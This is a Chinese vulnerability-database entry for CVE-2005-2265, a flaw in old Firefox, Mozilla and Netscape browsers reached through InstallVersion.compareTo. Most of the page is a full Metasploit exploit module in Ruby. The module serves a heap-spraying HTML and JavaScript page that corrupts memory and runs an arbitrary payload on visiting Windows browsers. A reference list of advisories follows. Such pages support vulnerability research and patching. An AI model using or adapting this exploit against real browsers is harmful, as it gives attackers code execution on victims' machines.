Mozilla firefox/mozilla/netscape 拒绝服务漏洞

Mozilla firefox/mozilla/netscape 拒绝服务漏洞

漏洞ID 1108928 漏洞类型
发布时间 2005-07-13 更新时间 2005-10-20
图片[1]-Mozilla firefox/mozilla/netscape 拒绝服务漏洞-安全小百科CVE编号 CVE-2005-2265
图片[2]-Mozilla firefox/mozilla/netscape 拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200507-174
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/9947
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-174
|漏洞详情
firefox、Mozilla及Netscape都是web浏览器软件。Firefox1.0.5之前版本、mozilla1.7.9之前版本以及Netscape8.0.2、7.2版本中存在拒绝服务漏洞。远程攻击者通过使用Object替代字符串的方式调用InstallVersion.compareTo,可导致存取错误及崩溃,产生拒绝服务。
|漏洞EXP
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	#
	# This module acts as an HTTP server
	#
	include Msf::Exploit::Remote::HttpServer::HTML

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name => HttpClients::FF,
		:ua_ver => "1.0",
		:os_name => OperatingSystems::WINDOWS,
		:javascript => true,
		:rank => NormalRanking, # reliable memory corruption
		:vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution',
			'Description'    => %q{
				This module exploits a code execution vulnerability in the Mozilla
			Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit 
			module is a direct port of Aviv Raff's HTML PoC.

			},
			'License'        => MSF_LICENSE,
			'Author'         =>  ['hdm', 'Aviv Raff <avivra [at] gmail.com>'],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE',    '2005-2265'],
					['OSVDB',  '17968'],
	  				['BID',    '14242'],
					['URL',    'http://www.mozilla.org/security/announce/mfsa2005-50.html'],
				],
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "x00",
				},
			'Targets'        =>
				[
					[ 'Firefox < 1.0.5 Windows', 
						{
							'Platform' => 'win',
							'Arch' => ARCH_X86,
							'StackAdjustment' => -3500,
							'Addrs' => [ 0x12000000, 0x11C0002C, 0x1200002C, 0x1180002C ],
							
						}
					],
				],
			'DisclosureDate' => 'Jul 13 2005'
			))
	end

	def on_request_uri(cli, request)
	
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
		send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
		
		# Handle the payload
		handler(cli)
	end
	
	def generate_html(payload)

		enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))
		
		spray_to = sprintf("0x%.8x", target['Addrs'][0])
		spray_slide1 = Rex::Text.to_unescape( [target['Addrs'][1]].pack('V'), Rex::Arch.endian(target.arch) )
		spray_slide2 = Rex::Text.to_unescape( [target['Addrs'][2]].pack('V'), Rex::Arch.endian(target.arch) )
		eax_address = sprintf("0x%.8x", target['Addrs'][3])

		return %Q|
<html>
<head>
<!-- 
     Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)
     From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx
     Greets: SkyLined, The Insider and shutdown 
-->
	<title>One second please...</title>
	<script language="javascript">

		function BodyOnLoad() 
		{
			location.href="javascript:void (new InstallVersion());";
			CrashAndBurn();
		};

		// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
		function CrashAndBurn() 
		{
			// Spray up to this address
			var heapSprayToAddress=#{spray_to};

			// Payload - Just return..
			var payLoadCode=unescape("#{enc_code}");

			// Size of the heap blocks  
			var heapBlockSize=0x400000;
			
			// Size of the payload in bytes
			var payLoadSize=payLoadCode.length * 2; 
			
			// Caluclate spray slides size
			var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header

			// Set first spray slide ("pdata") with "pvtbl" fake address - 0x11C0002C
			var spraySlide1 = unescape("#{spray_slide1}"); 

			spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize); 

			var spraySlide2 = unescape("#{spray_slide2}"); //0x1200002C 

			spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);

			var spraySlide3 = unescape("#{enc_nops}");
			spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);

			// Spray the heap
			heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
			//alert(spraySlide2.length); return;
			memory = new Array();
			for (i=0;i<heapBlocks;i++) 
			{
				memory[i]=(i%3==0) ? spraySlide1 + payLoadCode: 
						(i%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode;
			}

			// Set address to fake "pdata".
			var eaxAddress = #{eax_address};
			
			//	This was taken from shutdown's PoC in bugzilla
			// struct vtbl { void (*code)(void); };
			// struct data { struct vtbl *pvtbl; };
			//
			// struct data *pdata = (struct data *)(xxAddress & ~0x01);
			// pdata->pvtbl->code(pdata);
			//
			(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
		}

		function getSpraySlide(spraySlide, spraySlideSize) {
			while (spraySlide.length*2<spraySlideSize) 
			{
				spraySlide+=spraySlide;
			}	
			spraySlide=spraySlide.substring(0,spraySlideSize/2);
			return spraySlide;
		}

// -->
	</script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>
		|
	end

end
|参考资料

来源:www.mozilla.org
链接:http://www.mozilla.org/security/announce/mfsa2005-50.html
来源:MISC
链接:https://bugzilla.mozilla.org/show_bug.cgi?id=295854
来源:FEDORA
名称:FLSA:160202
链接:https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=160202
来源:BID
名称:14242
链接:http://www.securityfocus.com/bid/14242
来源:REDHAT
名称:RHSA-2005:601
链接:http://www.redhat.com/support/errata/RHSA-2005-601.html
来源:REDHAT
名称:RHSA-2005:587
链接:http://www.redhat.com/support/errata/RHSA-2005-587.html
来源:REDHAT
名称:RHSA-2005:586
链接:http://www.redhat.com/support/errata/RHSA-2005-586.html
来源:SUSE
名称:SUSE-SA:2006:004
链接:http://www.novell.com/linux/security/advisories/2006_04_25.html
来源:SUSE
名称:SUSE-SA:2005:045
链接:http://www.novell.com/linux/security/advisories/2005_45_mozilla.html
来源:SUSE
名称:SUSE-SR:2005:018
链接:http://www.novell.com/linux/security/advisories/2005_18_sr.html
来源:MISC
链接:http://www.networksecurity.fi/advisories/netscape-multiple-issues.html
来源:VUPEN
名称:ADV-2005-1075
链接:http://www.frsirt.com/english/advisories/2005/1075

相关推荐: APC apcupsd Local Denial of Service Vulnerability

APC apcupsd Local Denial of Service Vulnerability 漏洞ID 1103638 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2000-12-06 更新时间 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享